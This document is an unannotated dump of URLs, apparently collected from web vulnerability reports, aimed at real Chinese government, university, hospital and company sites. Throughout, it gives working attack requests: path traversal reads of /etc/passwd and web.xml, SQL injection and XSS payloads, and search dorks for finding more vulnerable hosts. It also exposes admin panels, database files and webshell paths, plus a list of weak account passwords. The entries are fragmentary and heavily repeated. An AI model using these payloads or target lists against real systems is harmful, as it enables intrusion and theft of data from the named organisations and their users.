http://pelican.admin.ccny.cuny.edu/cgi-bin/licenses.cgi?p=system_nimda&a=LOGIN https://124.93.238.176/cgi-bin/frame.cgi?p=system_admin&a=LOGIN http://mail.infokom.net/cgi-bin/licenses.cgi https://124.93.238.176/cgi-bin/licenses.cgi http://124.93.238.165/cgi-bin/licenses.cgi http://203.80.116.242/cgi-bin/licenses.cgi https://mailpr.coscodl.com/cgi-bin/licenses.cgi http://pelican.admin.ccny.cuny.edu/cgi-bin/licenses.cgi http://webapp.scjst.gov.cn:88/MCreditSC/EntApprove/scMain/CEINLogin.aspx http://webapp.scjst.gov.cn:88 http://www.rftgd.gov.cn/stgl/index.php http://www.rftgd.gov.cn/stgl/view.php?id=22 http://www.gylr.gov.cn/news.aspx?i=12122 http://www.baidu.com http://www.baidu.com http://dckf.digitalchina.com//index.php/point/login http://esf.sina.com.cn/ http://broker.esf.sina.com.cn/login/findpassword http://www.wanxinsoft.com/ http://foodbioeng-lab.xzit.edu.cn/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 
http://aacc.cumt.edu.cn/model/twogradepage/TrainSignUp.aspx?tblApparatusRepertoryListID=46285 http://sys.zafu.edu.cn/dy/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://labch.cumt.edu.cn:81/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://clpt.ecust.edu.cn/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=46259 http://qc.legendsec.com http://qc.legendsec.com/jmx-console/ sqlmap:python http://hz.jlfzg.com:6372/booking/bookingAction!hotelIndex.action http://118.244.158.17:81/Account/UserList http://www.hebxxt.com/yxt/jz_login.htm http://www.crcg.com.cn/ http://180.149.157.110/home/App http://180.149.157.110/home/App http://cyn.changyou.com/cyouApp/versionAdmin/downloadPage.shtml http://cyn.changyou.com/cyouApp/ http://cyn.changyou.com/cyouApp/advise/getAdviseList.shtml?vo.email=&page=1&rows=20&sort=id&order=desc&vo.appVersion=1.0.6 http://lib.mnu.cn/gdweb/AdvicesRequest.aspx?DBKey=20004 http://59.64.81.245/gdweb/AdvicesRequest.aspx?DBKey=20004 http://library.sptpc.com:8080/gdweb/AdvicesRequest.aspx?DBKey=20004 http://lib.cumtb.edu.cn/fsweb/AdvicesRequest.aspx?DBKey=20004 http://duirap7.uir.cn/gdlibweb/AdvicesRequest.aspx?DBKey=20004 http://211.80.179.195/AdvicesRequest.aspx?DBKey=20004 http://opac.syphu.edu.cn:8080/AdvicesRequest.aspx?DBKey=20004 http://library.scac.edu.cn/jpweb/AdvicesRequest.aspx?DBKey=20004 http://library.sptpc.com:8080/gdweb/AdvicesRequest.aspx?DBKey=20004 https://issues.apache.org/jira/secure/Dashboard.jspa https://issues.apache.org/jira/secure/Signup!default.jspa http://www.cshr.com.cn/csrcwhr/planning/MagazineWeeklySearch.aspx?key=1 http://hbmt.hisense.com/ http://hbmt.hisense.com/cn/feedback.aspx http://hbmt.hisense.com/manage/ http://hbmt.hisense.com/manage/website/ http://ioa.hisense-plaza.com/login/Login.jsp http://ioa.hisense-plaza.com/login/Login.jsp http://weihui.yy.com/invite?app=MTQ%3D&uid=MzIxMzg2MDM3OA%3D%3D&by=d3hfY2lyY2xl&from=timeline&isappinstalled=0 
http://weihui.yy.com inurl:bmtd.do http://hxasc.cn/bmtd.do?method=dept&deptid=00942001X http://218.201.232.67:8080/bmtd.do?method=dept&deptid=009550324 http://www.yjxzfw.com.cn/bmtd.do?method=dept&deptid=009568516 http://www.gygxzw.gov.cn:8066/bmtd.do?method=dept&deptid=73098219X http://www.tlsp.net/bmtd.do?method=dept&deptid=001190440 http://www.sinanxzfw.gov.cn/bmtd.do?method=dept&deptid=009566449 http://www.yjxzfw.com.cn/bmtd.do?method=dept&deptid=009568516 http://www.gygxzw.gov.cn:8066/bmtd.do?method=dept&deptid=73098219X http://www.tlsp.net/bmtd.do?method=dept&deptid=001190440 http://58.42.249.116/bmtd.do?method=dept&deptid=429280359 http://218.201.232.67:8080/bmtd.do?method=dept&deptid=009550324 http://hxasc.cn/bmtd.do?method=dept&deptid=00942001X http://jc.dlxg.gov.cn/bmtd.do?method=dept&deptid=d6e101334862aafd01dd http://jjjc.sqxz.gov.cn/bmtd.do?method=dept&deptid=750177518 http://119.1.108.246/bmtd.do?method=dept&deptid=009618288 http://58.42.241.14:6778/bmtd.do?method=dept&deptid=00941049x http://119.1.108.246/bmtd.do?method=dept&deptid=009618421 http://home2.xywy.com:80/jkgl.php?type=doc_list&page=2 http://zhongyi.sina.com/,登录随便一个账户 http://www.wyidai.com/list/list_zyfw.php?category=487 http://219.142.55.69:8080/400sys/index.jsp http://219.142.55.69:8080/400sys/x.jsp http://219.142.55.69:8080/400sys/login.do http://219.142.55.69:8080/400sys/400sys/number_available.do http://219.142.55.69:8080/400sys/index.jsp http://cs.hn96531.com/manage/login/login.aspx www.hismarttv.com/getTopicAppById.jhtml?deviceCode=1&deviceType=003&topicId=9000005114762 www.hismarttv.com/getTopicAppById.jhtml?deviceCode=1&deviceType=003&topicId=9000005114762 http://apf.umeng.com/apf/public/test.jsp encap:Ethernet addr:211.151.139.213 Bcast:211.151.139.255 Mask:255.255.255.192 MTU:1500 packets:468325720 packets:11000645 txqueuelen:1000 http://www.enetedu.com/index.php/Public/noticeDetail?id=1146 http://www.enetedu.com/index.php/Event/teachSalonInter?id=146 
http://www.enetedu.com/index.php/Event/salonAn?ids=999 http://www.enetedu.com/index.php/Event/teachVotingC?id=14143 http://www.enetedu.com/index.php/Event/teachCourseWareQ?id=14083 http://www.enetedu.com/index.php/Event/teachEssayE?id=701 http://www.enetedu.com/index.php/Center/centerDetail?id=19 http://www.enetedu.com/index.php/Course/courseDetail?id=742 http://sms.womai.com/login.aspx http://sms.womai.com/log.txt inurl:showfwly.asp?id= http://www.dbawx.com/showfwly.asp?id=51 http://www.lsayy.com/showfwly.asp?id=34 http://www.huangganglawyer.com/showfwly.asp?id=31 http://www.yangdafei.com/showfwly.asp?id=49 http://shweikuo.com/showfwly.asp?id=52 http://www.sdzzsx.com/showfwly.asp?id=22 http://www.gdzhfl.com/showfwly.asp?id=47 http://www.shweikuo.com/showfwly.asp?id=57 http://dzthpg.com/showfwly.asp?id=48 http://218.95.46.68/slx/01/showfwly.asp?id=49 http://www.lnqylaw.com/showfwly.asp?id=35 http://lnqylaw.com/showfwly.asp?id=46 http://xqxlzx.com/showfwly.asp?id=44 http://www.xzlawcn.com/showfwly.asp?id=23 http://www.fzybfc.com/showfwly.asp?id=43 http://lycareer.com/showfwly.asp?id=57 http://jshbls.com/showfwly.asp?id=27 http://www.jinshunsw.com/showfwly.asp?id=53 http://cdzyk.com/showfwly.asp?id=35 http://www.feiyingsw.com/showfwly.asp?id=49 http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&length= www.2925.com http://zhongyi.sina.com/login.html angel:123456 anita:123456 cherish:123456 cherry:123456 gan:123456 jasmine:123456 lian:123456 winni:123456 yolanda:yolanda michael:zxcvbnm123 stanly:abcd1234 maxwell:123456789 viva:123456789 benjamin:a123456 carlos:a123456 dede:a123456 free:a123456 demo1:111111 hunter:123123 hello:000000 cole:000000 blair:123456qq http://zhongyi.sina.com/UIAjax/CheckValue.ashx?&value=$username http://zhongyi.sina.com/user/uiHandler/regHandler.ashx?methodName=checkUserName POST:username=$username http://www.liqunshop.com/ http://iot.189.cn http://www.yinyuetai.com/fckeditor/editor/filemanager/connectors/test.html 
http://aqbzh.chinasafety.gov.cn/sps/loginaction!logout.action http://xss.name/Y5JJGU http://waiqin.gdbnet.cn:8011/themes/ user:Admin@zqb0.com www.hnsip.com http://123.134.189.60:8016/bmfw/jwhzdlist.aspx?zd=218 http://61.133.119.187:8091/bmfw/jwhzdlist.aspx?zd=218 http://222.135.76.147:8200/bmfw/jwhzdlist.aspx?zd=218 http://221.2.156.181:8800/bmfw/jwhzdlist.aspx?zd=218 http://222.135.109.70:8200/bmfw/jwhzdlist.aspx?zd=218 http://221.2.149.47:8200/bmfw/jwhzdlist.aspx?zd=218 www.wooyun.org/bugs/wooyun-2010-07224 http://www.haitiansoft.com:8080/ http://180.166.7.94/VO_EmailCaoGao.asp?StartDate=8 http://oa.tjfsu.edu.cn/VO_EmailCaoGao.asp?StartDate=8 http://vos.tjufe.edu.cn/VO_EmailCaoGao.asp?StartDate=8 http://oa.ccib.com.cn/VO_EmailCaoGao.asp?StartDate=8 http://121.30.226.44/VO_EmailCaoGao.asp?StartDate=8 http://viewsonic.zol.com.cn/detail.php?id=1428 http://www.lzgjj.gov.cn/news.do?method=findChannelListjsp&channelid=170 http://login.med.wanfangdata.com.cn/Account/ForgetPassword http://login.med.wanfangdata.com.cn https://demo.emay.cn/log.txt http://www.hbgsny.com/Admin/pages/fileManager.aspx?bp= http://www.jtlth.com/bdsitemap.txt http://www.enlio.com/robots.txt http://58.32.246.97/ http://58.32.246.97/admin/index.php http://www.hicourt.gov.cn/xingsh/xingsh_list.asp?id=6 http://jwc.lcudc.cn/readnews.asp?id=139 http://jwc.lcudc.cn/admin/login.asp http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Length=1.4km https://121.207.254.57/users/user_list.php?level=1%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E https://121.207.254.57/users/user_list.php?level=1 http://www.hicourt.gov.cn/xingsh/xingsh_list.asp?id=6 http://logserver.cnepay.net/#/dashboard/elasticsearch/%E4%B8%AD%E6%B1%87%E6%94%AF%E4%BB%98%E6%97%A5%E5%BF%97%E6%9F%A5%E8%AF%A2%E7%B3%BB%E7%BB%9F http://jxzy.gzxw.gov.cn/course/course_view.asp?cid=2334 http://xxxx.com/product/list.php?type_id=1,其中type_id存在多处注入漏洞。 http://192.168.0.107/brand/list.php?brand_id=1,其中brand_id存在注入漏洞 
http://fortune.cib.com.cn/futures/default.jsp?team=1%29;%3C/script%3E%3Cscript%3Ealert%28121%29%3C/script%3E http://bbs.inwatch.cc/index.php?m=faq http://open.t.sdo.com/ http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.dxyzzx.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.tzjyzb.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.hdsyex.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://202.108.154.209/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://www.dxyzzx.com/datacenter/downloadApp/loadAppInfo.do?1414310370856&appId=f889bbb1102247d2ae00c85dbdd51ea8&versionType= http://202.108.154.209//datacenter/getfile.do?path=../../../../../../../../../../etc/passwd http://www.infosea.com.cn/ http://211.86.195.15:8086/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.86.225.3:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://218.241.174.148:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://61.187.55.41:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://www.kflib.cn:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://lib.tongde.com:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://58.133.216.9:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.sdwm.cn:8000/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://scsk.crsp.org.cn:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://222.27.60.13/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.ndjclib.com:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.84.229.10:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://tsjs.ndjclib.com:8070/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://211.86.225.3:8090/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk 
http://211.86.195.15:8086/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk http://lib.tongde.com:8089/opac/hot.jsp?flh=A%25&rq=7&wxlx=zyk inurl:index.php?g=Home&m=Index&a=help http://www.fifee.com/ http://lierk.cn/index.php?m=Index&a=login+ http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg http://114.215.185.138/index.php?m=Users&a=checklogin http://wechat.lx1999.com.cn/index.php?m=Users&a=checklogin http://www.jpsbzr.com/index.php?m=Index&a=login http://www.iweichat.com/index.php?m=Index&a=login http://166u.cn/ http://wx.lefangw.cn/index.php?g=Home&m=Index&a=help http://www.perc-sinano.com/xsdt.asp?id=62 www.gd189fq.com/goods.php?id=228,wooyun上已经有人报过 http://bbs.hiwifi.com http://bbs.hiwifi.com/home.php?mod=space&uid=171650&do=profile http://bbs.mgame.baidu.com/config/config_ucenter.php,菜刀连接失败,确实被修补了 http://bbs.mgame.baidu.com/config/config_ucenter.php.bak http://bbs.mgame.baidu.com/config/config_ucenter.php.bak,密码1 www.vmaibo.com/user/userp.action http://www1.dqpi.edu.cn/qmgc/admin/Admin_Login.asp http://**.**.**/index.do http://121.199.53.253:8081/nexus/index.html http://121.199.53.253/settings.xml http://121.199.53.253/ http://121.199.53.253:8080/console http://121.199.53.253:8080/fly/html/login.html http://www.faqrobot.org/typical_case.html ip:121.199.34.83 http://218.16.125.82:8081/admin/login.asp http://124.238.218.155/ImageShowServlet?guestID=&images=../../../../../../../../../../windows/win.ini http://job.shenzhenair.com/recruitment/index/search/?area=&area_name=%E4%B8%8D%E9%99%90&company=&company_name=%E4%B8%8D%E9%99%90&employe=1&jt=39&keyword=1&systemjobtype= http://www.hjsoft.com.cn/ inurl:hireNetPortal/search_zp_position.do http://60.166.10.93:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.26.178.146:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.94.159.38:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://hr.bmec.net/pos/posbusiness/train_get_code_tree.jsp?codesetid= 
http://122.159.45.20:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://183.63.101.122:8999/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://122.159.45.20:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.com.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://218.67.240.11:8081/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://211.144.211.180:8083/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://zp.farmer.com.cn/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://61.139.52.123:8082/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://60.166.10.93:8080/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://218.26.178.146:8888/pos/posbusiness/train_get_code_tree.jsp?codesetid= http://122.159.45.20:8888/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://www.pharm.com.cn:90/performance/kh_plan/get_code_treeinputinfo.jsp?codesetid= http://115.com/?mode=jianli https://113.107.199.107/ http://www.phoenixcne.de/caiji_news_list.php?category=military http://www.phoenixcne.de/head_news_content.php?news_id=133373 http://www.phoenixcne.de/guide.php?satellite_id=2 http://www.phoenixcne.de/head_news_comment.php?news_id=136676 http://www.phoenixcne.de/recom_comment.php?recom_id=243 http://tv.coocaa.com/orderInfo/getAdd.html url:http://traffic.sun0769.com/kccx/default.asp?start= http://zfzx.cug.edu.cn/ http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102’ http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 http://zfzx.cug.edu.cn/ArticleShow.asp?ID=102 inurl:bmtd.do http://jjjc.sqxz.gov.cn/spcode.do?bsnum=522224775340465004-000 http://58.42.241.14:6778/spcode.do?bsnum=522224775340465004-000 
http://www.gygxzw.gov.cn:8066/bszn.do?sxbh=52011573098219X002&sxzxbh=004 www.tlsp.net/bszn.do?sxbh=211200001190440007&sxzxbh=000 http://222.135.109.70:8200/hnzc.aspx?CountryName=%e6%96%87%e7%99%bb%e5%b8%82&level=1 http://61.133.119.187:8091/hnzc.aspx?CountryName=%e9%ab%98%e6%8a%80%e5%8c%ba&level=1 http://218.56.159.98:8001/hnzc.aspx?CountryName=%e8%8e%92%e5%8e%bf&level=0 http://218.56.40.229:8001/hnzc.aspx?CountryName=%e7%83%9f%e5%8f%b0%e5%b8%82&level=0 http://218.58.124.131:8003/hnzc.aspx?CountryName=%e9%ab%98%e6%96%b0%e5%8c%ba&level=0 http://60.217.72.17:7081/hnzc.aspx?CountryName=%e7%ab%a0%e4%b8%98%e5%b8%82&level=0 http://123.134.189.60:8016/hnzc.aspx?CountryName=%e8%8e%b1%e8%8a%9c%e5%b8%82&level=0 http://222.134.154.214:8001/hnzc.aspx?CountryName=%e5%8d%97%e9%ba%bb%e9%95%87&level=2 http://221.2.149.47:8200/hnzc.aspx?CountryName=%e5%a8%81%e6%b5%b7%e5%b8%82&level=0 http://222.135.76.147:8200/hnzc.aspx?CountryName=%e8%8d%a3%e6%88%90%e5%b8%82&level=1 http://221.2.171.59:8200/hnzc.aspx?CountryName=%e7%bb%8f%e6%8a%80%e5%8c%ba&level=1 www.grasp.com.cn http://system.fastexpress.com.cn http://system.fastexpress.com.cn/Ftp/Notice/2014-07-01/ http://www.kf5.com/product/tour/ https://wooyun.kf5.com/ http://staff.chinac.com/forum.php http://srm.mindray.com/login/index.action http://dfzc.dfac.com:8091/dfpc/login.action http://fsop.caac.gov.cn/les/License/mod/addList.jsp?pilot_id=32 http://**.**.**/goods/listcid=9&b=46 http://dz.basbus.cn/account/find http://jjnsg.com/op/htmledit/admin_login.asp http://jjnsg.com/op/htmledit/db/ewebeditor.mdb http://jjnsg.com/op/htmledit/UploadFile/2014113022373124.asa(请自行删除) http://www.ickey.cn/box/www/ http://www.ickey.cn/box/www/admin http://www.ickey.cn/box/www/admin/account-settings-database.php http://www.baidu.com/home/xman/data/xcardget?id=10&get=user http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Forder%2Fwin%2F%3FagentId%3D5881 
http://www.lecai.com/user/cooperator/baidu/card_login.php?referer=http%3A%2F%2Fwww.lecai.com%2Fuser%2Fmylottery%2F%3FagentId%3D5881&bd_info=......&bd_sign=......&bd_appid=2490867&bd_bind=true http://113.31.31.153:28017/ http://hcms.hit.edu.cn/trans/read_news.php?NEWS_ID=187 http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1 https://moa.10086.cn https://moa.10086.cn/../../../../../../../../../etc/hosts http://211.139.80.193/login.jsp http://hao.lenovo.com.cn/mps/wei_xs/wei_xs_ajax.php?id=1 http://219.135.157.130/HomePageOut/showListBAction.action http://www.foreveross.com/portal-Portal-getPortalInfo.action https://vendor.wanda.cn/tender/TMX/TenderNoticeDetail.aspx?keyid= http://www.dzjw.gov.cn/xjxc/view.asp?id=107 http://55z.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn 
http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://wz.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn 
http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://xgh.xhqedu.gov.cn http://xhyey.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://19z.xhqedu.gov.cn http://jsj.xhqedu.gov.cn http://xcj.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://wz.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxl.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://hz.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://zxx.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://55z.xhqedu.gov.cn http://xxj.xhqedu.gov.cn http://wj.xhqedu.gov.cn http://lmk.xhqedu.gov.cn http://xsj.xhqedu.gov.cn http://20z.xhqedu.gov.cn http://xwa.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://lml.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://tyl.xhqedu.gov.cn http://hx.xhqedu.gov.cn http://xy.xhqedu.gov.cn http://18z.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://sy.xhqedu.gov.cn http://xwy.xhqedu.gov.cn http://tjl.xhqedu.gov.cn http://54z.xhqedu.gov.cn http://xy.xhqedu.gov.cn https://vendor.wanda.cn/tender/TMX/TenderNoticeList.aspx http://center.tkfy.kongzhong.com/user/get_user_server?account= http://www.zoneking.cn/ http://www.zoneking.cn/Zkuser/zkuser.html inurl:/happy/|/health/|/ardour/|/active/ http://medical.cyszxyy.com:8080/happy/index.asp http://www.syyyy.cn:82/happy/index.asp http://www.kqtjzx.com/happy/index.asp http://tjzx.bydsfy.com/happy/index.asp http://itha.nmciq.gov.cn/happy/index.asp http://tjzx.hzch.gd.cn/happy/index.asp http://www.sptdch.cn:8080/happy/index.asp http://chati.shiliyiyuan.cn/tjinfo/tjsearch.asp http://xqxtj.com/health/index.asp http://qzhtjktj.com/ardour/index.asp 
http://www.jyyyw.com:9000/happy/index.asp http://sh.88888719.com/health/index.asp http://www.dazhebei.cn/ardour/index.asp http://www.pmzfy.com/ardour/index.asp http://www.yqtjzx.com/happy/index.asp http://www.xnsdyyy.com/happy/index.asp http://www.zswsxxw.com/happy/index.asp http://www.xy2fytjzx.com/happy/index.asp http://www.xy2fytjzx.com/happy/index.asp http://jkcx.xidian.edu.cn/happy/index.asp http://rcs.zgsyb.com.cn/Reporter/User/Regist.asp http://www.oilphoto.com.cn/index/wdetail?id=1202555 http://iot.189.cn/backendadmin/login.html http://www.libsys.com.cn/huiwen_app_center_2.php http://111.10.24.230:8081/ getshell:http://111.10.24.230:8081/UploadFile/2014/12/01/122932.jsp http://vipcard.petrochina.com.cn:80/ http://111.85.98.165/),"软件下载"处修改文件可下载任意文件。 http://eiabbs.cn/ http://eiabbs.cn/uc_server http://eiabbs.cn/0.php http://eiabbs.cn/phpmyadmin localhost:3307 ip:182.92.1.189 http://htzx.jbedu.net/Code/Common/Navigation.aspx?ModelID=1 http://www.yzzqzx.com/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.jszx.cn/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.zxsdszx.com/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.yzwxzx.net/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.nbyzsy.cn/Code/Common/Navigation.aspx?ModelID=1 http://www.jszx.cn/Code/Common/Navigation.aspx?ModelID=1%27%20and%201=@@version-- http://www.yzzqzx.com/Code/Common/Navigation.aspx?ModelID=1 http://htzx.jbedu.net/Code/Common/Navigation.aspx?ModelID=1 http://www.nbyzsy.cn/Code/Common/Navigation.aspx?ModelID=1 http://www.zxsdszx.com/Code/Common/Navigation.aspx?ModelID=1 http://www.yzwxzx.net//Code/Common/SysCommonAttach.aspx?Method=GetFileList为例: http://www.yzwxzx.net/UpLoad/ElBook/20100304115625376.txt为例: http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=DeleteFile&ID=1021 http://www.laoganma.com.cn/c_datapage.jsp?ID=201410232045399236664108530330 http://115.28.38.120:28017/ 
http://221.228.228.63:28017/ http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://60.171.34.186/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.szzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.ydzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.fcxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.lbzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.tlzbcg.com/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.sxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.sixianzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.jzzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web http://www.xxzfcg.gov.cn/CmsNewsController.do?method=downFile&fileUrl=../WEB-INF/web.xml&viewName=web 